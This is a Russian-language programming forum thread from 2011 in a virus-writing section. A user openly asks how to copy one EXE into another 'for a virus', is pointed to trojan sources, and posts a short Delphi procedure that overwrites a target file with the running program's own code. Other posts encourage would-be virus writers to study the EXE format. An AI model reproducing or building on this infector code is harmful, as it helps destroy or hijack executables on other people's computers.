Пятница, 10.07.2020, 23:25 Приветствую вас Гость | Группа "Гости" 
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx  
delfcode » Delphi » Вирусология Delphi » Как побайтно считать файл))) (Как побайтно считать файл)))Признаюсь сразу, что это для вир)
Как побайтно считать файл)))
link993Дата: Четверг, 02.06.2011, 11:44 | Сообщение # 1
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
Как побайтно считать файл exe и записать его в другой exe)))Признаюсь сразу, что это для вируса... Заранее спасибо!!
smile Если можете объясните пжл подробно))


Сообщение отредактировал link993 - Четверг, 02.06.2011, 11:45
 
gravitasДата: Четверг, 02.06.2011, 12:24 | Сообщение # 2
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Quote (link993)
Как побайтно считать файл exe и записать его в другой exe)))Признаюсь сразу, что это для вируса... Заранее спасибо!! Если можете объясните пжл подробно))

В файлах мой I-Dron (исходники троянов). Код от дельфина. Там именно такой способ заажения.


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
link993Дата: Четверг, 02.06.2011, 15:39 | Сообщение # 3
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
Это (если не ошибаюсь):
Code
procedure InfFile(filename:string);
var
otkyda, kyda: file;
n : integer;
MyBuf: array[1..Size] of Char;
FM:word;
begin
   FM:=FileMode;
   FileMode:=0;
   AssignFile(otkyda, ParamStr(0));
   Reset(otkyda, 1);
   BlockRead(otkyda, MyBuf, SizeOf(MyBuf), n);
   CloseFile(otkyda);
   FileMode:=2;
   AssignFile(kyda, filename);
   Rewrite(kyda, 1);
   BlockWrite(kyda, MyBuf, n);
   CloseFile(kyda);
   FileMode:=FM;
end;
 
link993Дата: Четверг, 02.06.2011, 15:42 | Сообщение # 4
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
*Ээ. Потише тут*
Я эту шнягу у себя на компе запустил biggrin Извините... sad
Тем кто хочет написать вирус советую разобратся в структуре EXE файлов ссылкаДоступно только для пользователей


Сообщение отредактировал link993 - Четверг, 02.06.2011, 15:50
 
dolphinДата: Суббота, 04.06.2011, 13:00 | Сообщение # 5
Администратор
Сообщений: 906
Статус: Offline
Quote (link993)
Тем кто хочет написать вирус советую разобратся в структуре EXE файлов ссылкаДоступно только для пользователей http://www.wasm.ru/article.php?article=green2red02

Это больше для тех кто на асме, на делфе намного сложнее, но тоже можно


Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
 
delfcode » Delphi » Вирусология Delphi » Как побайтно считать файл))) (Как побайтно считать файл)))Признаюсь сразу, что это для вир)
  • Страница 1 из 1
  • 1
Поиск:

delfcode.ru © 2008 - 2020 Хостинг от uCoz